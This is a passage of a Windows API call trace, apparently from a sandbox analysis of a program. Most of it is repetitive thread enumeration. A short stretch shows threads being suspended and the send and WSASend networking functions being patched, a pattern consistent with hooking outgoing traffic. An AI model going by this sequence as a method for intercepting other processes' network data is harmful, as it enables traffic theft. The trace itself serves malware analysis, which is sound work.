lpte=0x2eefce4) returned 1 [0175.837] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.837] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.837] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.838] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.838] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.838] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.838] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.839] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.839] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.839] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.839] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.840] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.840] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.840] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.841] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.841] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.841] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.841] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.842] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.842] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.842] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.842] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.843] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.843] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.843] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.844] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.844] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.844] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.844] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.845] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.845] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.845] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.846] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.846] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.846] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.846] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.847] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.847] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.847] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.847] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.848] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.848] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.848] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.849] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.849] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.849] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.849] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.850] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.850] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.850] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.850] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.851] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.851] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.851] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.930] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.930] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.931] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.931] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.931] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.931] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.932] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.932] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.932] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.932] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.933] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.933] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.933] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.933] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.934] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.934] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.934] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.935] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.935] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.935] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.935] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.936] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.936] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.936] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.936] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.937] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.937] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.937] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.937] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.938] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.938] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.938] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.939] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.939] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.939] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.939] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.940] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.940] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.940] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.940] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.941] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.941] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.941] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.941] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.942] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.942] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.942] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.943] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.943] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.943] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.943] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.944] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.944] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.944] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.944] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.945] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.945] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.945] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.945] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.946] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.946] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.946] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.947] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.947] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.947] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.947] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.948] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.948] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.948] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.948] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.949] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.949] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.949] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.949] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.950] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.950] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.950] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.951] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.951] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.951] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.951] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.952] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.952] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.952] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.952] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.953] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.953] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.953] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.953] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.954] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.954] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.954] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.955] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.955] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.955] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.955] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.956] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0175.956] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.043] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x204) returned 0xa0 [0176.043] SuspendThread (hThread=0xa0) returned 0x0 [0176.043] CloseHandle (hObject=0xa0) returned 1 [0176.043] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x990) returned 0xa0 [0176.043] SuspendThread (hThread=0xa0) returned 0x0 [0176.043] CloseHandle (hObject=0xa0) returned 1 [0176.064] CloseHandle (hObject=0x9c) returned 1 [0176.064] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0176.064] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0176.064] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x94224 | out: lpflOldProtect=0x94224*=0x20) returned 1 [0176.065] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xa0000 [0176.065] RtlMoveMemory (in: Destination=0xa0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xa0000) [0176.065] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x94224 | out: lpflOldProtect=0x94224*=0x40) returned 1 [0176.078] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0176.079] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0176.079] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x94224 | out: lpflOldProtect=0x94224*=0x20) returned 1 [0176.079] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x1a0000 [0176.079] RtlMoveMemory (in: Destination=0x1a0000, Source=0x75bc4406, Length=0x5 | out: Destination=0x1a0000) [0176.079] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x94224 | out: lpflOldProtect=0x94224*=0x40) returned 1 [0176.084] GetCurrentProcessId () returned 0x2ac [0176.084] GetCurrentThreadId () returned 0x31c [0176.084] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0176.085] Thread32First (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.148] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.149] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.149] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.149] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.149] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.150] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.150] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.150] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.150] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.151] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.151] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.151] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.152] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.152] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.152] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.152] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.153] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.153] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.153] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.154] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.154] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.154] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.154] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.155] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.155] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.155] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.155] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.156] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.156] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.156] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.157] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.157] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.157] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.157] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.158] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.158] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.158] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.158] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.159] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.159] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.159] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.159] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.160] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.160] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.160] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.161] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.161] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.161] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.161] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.162] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.162] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.162] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.162] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.163] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.163] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.163] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.170] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.170] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.171] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.171] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.171] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.172] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.172] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.172] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.172] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.173] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.173] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.173] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.174] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.174] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.174] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.174] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.175] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.175] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.175] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.175] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.176] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.176] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.176] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.176] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.177] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.177] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.177] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.178] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.178] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.178] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.178] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.179] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.179] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.180] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.181] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.181] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.181] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.181] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.182] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.182] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.182] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.183] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.183] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.183] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.183] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.184] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.184] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.184] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.184] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.185] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.185] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.185] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.186] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.186] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.186] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.186] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.187] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.187] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.187] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.187] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.188] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.188] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.188] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.189] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.189] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.189] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.189] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.190] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.190] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.190] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.190] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.191] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.191] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.191] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.192] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.192] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.192] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.192] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.193] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.193] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.193] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.193] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.194] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.194] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.194] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.194] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.353] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.353] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.353] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.353] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.354] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.354] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.354] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.354] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.355] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.355] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.355] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.356] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.356] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.356] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.356] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.357] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.357] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.357] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.357] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.358] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.358] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.358] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.359] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.359] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.359] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.359] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.360] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.360] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.360] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.360] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.361] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.361] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.361] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.362] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.362] Thread32Next 